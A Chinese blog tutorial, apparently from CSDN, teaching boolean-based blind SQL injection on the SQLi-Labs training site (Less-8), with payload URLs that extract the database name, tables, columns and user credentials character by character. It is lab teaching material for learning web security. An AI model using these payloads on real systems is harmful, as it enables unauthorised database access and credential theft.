SQL注入——基于布尔的盲注(八)

已于 2022-03-03 15:06:15 修改
阅读量1.8k 收藏 5
点赞数 1
分类专栏: SQL注入 文章标签: mysql php web安全 数据库 网络协议
于 2022-02-19 16:34:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gjqhs/article/details/123014537
版权

本章目的

普及布尔盲注技术的运用场景及条件,熟悉length()、substr()、ascii()等函数的用法,掌握基于布尔的盲注基本流程。PS:面试回答主要为对错论

基本概念

盲注
在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些
方法进行判断或者尝试,这个过程称之为盲注。
>在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响
应时间不同)。一般情况下,盲注可分为两类
基于布尔的盲注(Booleanbased)
基于时间的盲注(Timebased)

基于布尔的育注
>某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语句,查看页面的返回结果(TrueorFalse)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。
基于时间的盲注
>又称延时注入,即使用具有延时功能的函数sleep、benchmark等,通过判断这些函数是否正常执行来获取数据库中的数据

盲注常用函数

if()
功能:条件判断。
语法格式:if(expr1,expr2,expr3):expr1为true则返回expr2,expr1为false则返回expr3。
注:仅MySQL支持if(expr1,expr2,expr3)。

left()
功能:截取具有指定长度的字符串的左边部分。
语法格式:left(strlength),如果str或length参数为NULL,则返回NULL值。
参数说明
str:要提取子串的字符串。
length:正整数,指定将从左边返回的字符数。length为0或为负,则LEFT返回一个空字符串
length大于str字符串的长度,则leftO返回整个str字符串。

length()
功能:返回字符串的长度,以字节为单位。
语法格式:length(str)

substr()、substring()
功能:从指定的位置开始,截取字符串指定长度的子串。
语法格式:substr(str,pos)或substr(str,pos,len),substring(str,pos)substring(str,pos,len)
参数说明
str:要提取子串的字符串。
pos:提取子串的开始位置
len:指定要提取的子串的长度

ascii()、ord()
功能:返回字符串最左边字符的ASCII码值
语法格式:ascii(str),ord(str)

cast()、convert()
功能:获取一个类型的值,并产生另一个类型的值。
>语法格式:cast(value as type),convert(value,type)

可转换的值类型
二进制,同带binary前缀的效果:BINARY
字符型,可带参数:CHARO
日期:DATE
时间:TIME
日期时间型:DATETIME
浮点数:DECIMAL
整数:SIGNED
无符号整数:UNSIGNED

延时函数sleep()
功能:让语句延退执行一段时间,执行成功后返回0。
语法格式:sleep(N),即延退执行N秒。

延时函数benchmark()
功能:让某语句执行一定的次数,执行成功后返回0。
语法格式:benchmark(coun,texpr),即让expr执行count次
注:仅MySQL支持该函数。

实验环境
攻击机:Pentest-Atk
(1)操作系统:Windows10
(2)安装的应用软件:sqlmapBurpsuiteFireFox浏览器及其插件Hackbar 、 等

(3)登录账号密码:操作系统帐号Administrator,密码?》《6
靶机:A-SQLi-Labs
(1)操作系统:本机(建议用虚拟机)不过我太懒了[]~( ̄▽ ̄)~*
(2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、
Webug3.0漏洞网站环境
(3)登录账号密码:操作系统帐号root,密码0145632

实验原理

(1)关于布尔盲注
某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。
(2)一些功能函数的说明
length(str):返回字符串(str)的长度,以字节为单位。
substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串(str)指定
长度(len)的子串。
asci(str):返回字符串(str)最左边字符的ASCII码。

实验步骤

本实验的目标是:以SQLi-Labs网站的Less-8为入口,利用基于布尔的盲注方
式获取SQLi-Labs网站的登录用户名和密码。

1.访间SQLi-Labs网站
在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的
SQLi-Labs网站Less-18。访问的URL为:

http://[靶机IP]/sqli-labs/less-18/

(行吧,复制粘贴好像也不需要注意什么大小写)

说明:本实验环境中FireFox浏览器已预安装Hackbar插件,在FireFox界面
按下键盘上的F9键启用或停用(本实验环境中默认为启用状态)。建议在注入
过程中用Hackbar插件来调整payload参数!没有的点我参考     浏览器加载插件

登录后,根据网页提示,给定一个?id=1的参数,即:

http://[靶机IP]/sqli-labs/less-18/?id=1

此时页面显示信息为Youare in.,显示状态为True

PS:右上角是我的翻译,有时候你们发现和我不太一样不用疑惑

如果给定一个zid=-1的参数,即:

​http://[靶机IP]/sqli-labs/less-18/?id=-1

此时页面显示信息为空,显示状态为False。

可以继续给定不同的id参数进行尝试,发现页面的显示结果只有两种:True或False。由此可以判断,这是一种典型的布尔盲注场景。

2.寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型:

​http://[靶机IP]/sqli-labs/less-18/?id=1'

运行后页面显示为False!

​http://[靶机IP]/sqli-labs/less-18/?id=1'1

 运行后页面显示为True!

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and '1'='2

运行后页面显示为False!

由上述结果可以判断,网站存在字符型注入点。
3.盲猜网站当前所在数据库的库名长度
假设当前所在数据库的库名长度为N,尝试使用判断语句
length(database())=M,不断变化M的值去猜测,如果M不等于N,页面应该
显示为False:如果M等于N,页面应该显示为True。
例如执行如下payload

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=7--+

显示结果为False,说明网站当前所在数据库的库名长度不是7个字符!

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8--+

显示结果为True,说明网站当前所在数据库的库名长度为8个字符!

4.盲猜网站当前所在数据库的库名字符串
本步骤通过逐个字母盲猜的方式进行。
假设库名字符串的第1个字母为a,那么条件判断语句substr(库名字符串,1,1)='a'以及asci(substr(库名字符串,1,1))=97返回的结果均应为True(小写字母a的ASCI码为97)假设库名字符串的第2个字母为b,那么条件判断语句substr(库名字符串,2,1))='b'以及asci(substr(库名字符串,2,1)=98返回的结果均应为True(小写字母b的ASCII码为98)
以此类推。
猜测库名的第1个字母:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr(database(),1,1)="s"--+

或是

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr(database(),1,1))=115--+

猜测库名的第2个字母:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr(database(),2,1)='e'--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr(database(),2,1))=101--+

库名的第2个字母为e。

 以此类推,最终得到的字符串结果为 security

5.盲猜数据库 security的全部表名

(1)猜测第1张表的表名

猜测第1张表的表名的第1个字符:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+

或:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101--+

第1张表的表名的第1个字符为e

 猜测第1张表的表名的第2个字符:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1)='m'--+

或者

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109--+

 第1张表的表名的第2个字符为m,以此类推,得到 security库中的第1张表的名字为 emails

(2)猜测第2张表的表名

猜测第2张表的表名的第1个字符:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='r'--+

or

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114--+

第2张表的表名的第1个字符为r

 猜测第2张表的表名的第2个字符

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1)='e'--+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101--+

第2张表的表名的第2个字符为e。

以此类推,得到security库中的第2张表的名字为referers。
依据上述方法,通过不断变换limit和substr()函数中的参数,可以最终得到security库中所有表的表名:emails、referers、uagents和users。其中,第4张表users当中可能存放着网站用户的基本信息

6.盲猜 users表的全部字段名

(1)猜测第1个字段名

猜测第1个字段名的第1个字符

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i'--+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105--+


第1个字段名的第1个字符为i

猜测第1个字段名的第2个字符为d

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema= 'security' and table_name='users' limit 0,1),2,1)= 'd' --+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema= 'security' and table_name='users' limit 0,1),2,1))= 100--+

 第1个字段名的第2个字符为d

 以此类推,得到 users表中的第1个字段名为id

依据上述方法,通过不断变换limit和 substr()函数中的参数,可以最终得到 users表中所有字段名:id、 username和 password

7.盲猜 users表 username和 password字段的全部值

(1)猜测第1组数据

猜测第1组数据的第1个字符:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1)='D'--+

or

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))=68--+

 第1组数据的第1个字符为D。

猜测第1组数据的第2个字符;

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and substr((select concat_ws(',',username,password) from security.users limit 0,1),2,1)='u'--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),2,1))=117--+

 第1组数据的第2个字符为u。

以此类推,得到第1组数据为Dump.Dump。
注意:字符串中的逗号(,)也是需要进行猜测比对的!例如第1组数据的第5个字符:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and substr((select concat_ws(',',username,password) from security.users limit 0,1),5,1)=','--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),5,1))=44--+

 (2)猜测第2组数据
猜测第2组数据的第1个字符

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and substr((select concat_ws(',',username,password) from security.users limit 1,1),1,1)='A'--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and ascii(substr((select concat_ws(',',username,password) from security.users limit 1,1),1,1))=65--+

第2组数据的第1个字符为A。

 猜测第2组数据的第2个字符:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and substr((select concat_ws(',',username,password) from security.users limit 1,1),2,1)='n'--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'  and ascii(substr((select concat_ws(',',username,password) from security.users limit 1,1),2,1))=110--+

第2组数据的第2个字符为n。

 ........

以此类推,得到第2组数据为"Angelina,l-kill-you"
依据上述方法,通过不断变换limit()和substr()函数中的参数,可以最终得到users
表中username和password字段的全部值。

SQL注入 ——sql数据库操作基础(一)_Gjqhs的博客-CSDN博客

SOL注入——HTTP头部注入(六)_Gjqhs的博客-CSDN博客

SQL注入——基于报错的注入(五)_Gjqhs的博客-CSDN博客

...

更多包括而不限于SQL注入的文章,关注我全部带走吧( •̀ ω •́ )✧

告诉桃花不用开了
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-基于布尔盲注
xdjxi的博客
02-18 627
实验目的 了解布尔盲注技术的运用场景及条件,熟悉length()、substr()、ascii()等函数的用法,掌握基于布尔盲注基本流程。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-8为入口,利用基于布尔盲注方式获取SQLi-Labs网站的登录用户名和密码。 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-8。访问的URL为: http://[靶机IP]/s
SQL注入——布尔盲注
rane的博客
03-18 254
盲注 可以进行SQL注入,但是不能通过SQL注入漏洞看到数据库中的信息,但是可以通过真假判断数据库中的信息 布尔盲注的方法: 构造逻辑判断语句,判断信息的真假,取出所有的真值 以Less-8为例 还是老步骤,初步判断是否存在SQL注入漏洞 http://127.0.0.1/Less-8/?id=1返回You are in… http://127.0.0.1/Less-8/?id=1’无返回 可以初...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
03-27
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。 超级SQL注入工具支持盲注环境获取世界各国语言数据,解决了各种常见注入工具在盲注环境下无法支持中文等多字节编码的数据。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
渗透测试基础-盲注布尔盲注和时间盲注
weixin_45488495的博客
04-09 4144
渗透测试基础-盲注布尔盲注和时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注和时间盲注 盲注也分布尔盲注和时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
SQL注入之路之二:布尔型(boolean)盲注_sqlmap布尔盲注
最新发布
2401_84970106的博客
05-13 681
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
深入浅出带你学习布尔盲注
Galaxy_0的博客
02-19 532
深入浅出带你学习布尔盲注
SQL注入布尔盲注——sql-lab第
_Co1a
12-21 1484
布尔盲注简介 什么是盲注 盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。 【之前在做联合注入第一关的时候,用union select语句注入,想要查询的信息是回显在Your password和 Your Login name后面,如下图。但是盲注不会回显让你直白的看出信息的(但是可能会有一些间接的回显信息),所以只能通过另外一种方式去获取我们的信息】 盲注分为两类: 1、布尔盲注——》 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信
盲注(基于布尔型和时间的盲注
qq_35345771的博客
04-05 465
这种攻击的出现是因为界面不再显示报错信息,没法基于错误提示的方法。 1.盲注介绍 主要内容: 向数据库发送对应true或者false问题,根据应用程序返回的信息判断结果 几个函数: substr(str,start,len):截取字符串,将str从start(从1开始)位置截取从start开始len长度(包括start) ascii(i):返回i字符的ascii值 2.Get基于时间...
布尔盲注(一)
qq_45300786的博客
07-11 2295
盲注介绍: 注入攻击的本质,是把用户输入的数据当成代码执行。 这里有2个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据。 盲注所对应的是显错注入,显错注入我们之前讲过,但是很多时候, web服务器关闭了错误回显,这时候就没有办法实行SQL注入了吗? 2.常用函数 length()长度函数 substr()截取字符串 ascii()返回字符的ascii码 sleep()延迟函数 if(expr1,expr2,expr3)判断函数,有点类似于三元运算 3、
sql注入布尔盲注
2401_82760239的博客
04-03 1010
为啥要用ASCII码呢,select substr(database(),1,1)='q' and sleep(3)这种直接写='a'的形式不是也可以吗,但是在时间盲注猜解时,如果一个一个试非常的麻烦而且工作量巨大,这个时候就应该写一个脚本,自动的来猜测,脚本如果直接用字母符号计算的时候会比较慢,所以使用ASCII码会提高效率。很多函数都有变种,用法与效果类似,名字不同,在某些时候,一些函数被禁止调用,可以寻找其变种来使用,如:substr与mid,left()从左往右截,ascii与ord。
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
渗透测试-SQL注入布尔盲注和时间盲注
lza20001103的博客
04-20 2790
渗透测试-SQL注入布尔盲注和时间盲注
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2126
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
布尔盲注
m0_52880296的博客
05-06 4032
一.布尔盲注原理: 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false, 构造SQL语句, 利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false, 从而达到注入的目的来获取信息的一种方法 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false 例如 :sql-labs /less-7 它只有两种提示 所以可以用布尔盲注 playload:and length(databas
SQL注入原理-布尔盲注
T1ngSh0w的博客
09-15 2118
SQL注入原理-布尔盲注+手写python脚本
SQL注入-布尔盲注
acepanhuan的博客
02-10 1649
学习SQL注入方法之盲注
pikachu——布尔盲注
10-03
基于引用和引用的内容,布尔盲注是一种注入攻击技术,它利用了数据库布尔逻辑。在布尔盲注中,攻击者通过构造不同的SQL语句来判断查询的结果是真还是假,从而获取敏感信息。通过输入不同的条件,攻击者可以观察到页面上的0和1的变化,或者监控后台执行的时间来判断查询是否成功。 在这个特定的情况下,我们可以使用布尔盲注来猜测数据库名称的第一个字符。首先,我们可以通过输入' and ascii(substr(database(),1,1))>113# 来测试第一个字符的ASCII码是否大于113(对应字母p的ASCII码)。如果页面显示"不存在",说明第一个字符的ASCII码小于或等于113,我们可以继续向下猜测。然后我们可以使用' and ascii(substr(database(),1,1))=112# 来测试第一个字符是否等于112(对应字母p的ASCII码)。如果页面显示成功,则确认第一个字符是p。 接下来,我们可以使用类似的方法来查找其他信息。例如,输入' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<112# 来查找pikachu数据库中第一个表的第一个字符的ASCII码是否小于112。如果页面显示成功,则说明该字符的ASCII码小于112。 请注意,手工注入可能比工具注入慢,但可以帮助我们理解攻击原理,这是很有必要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值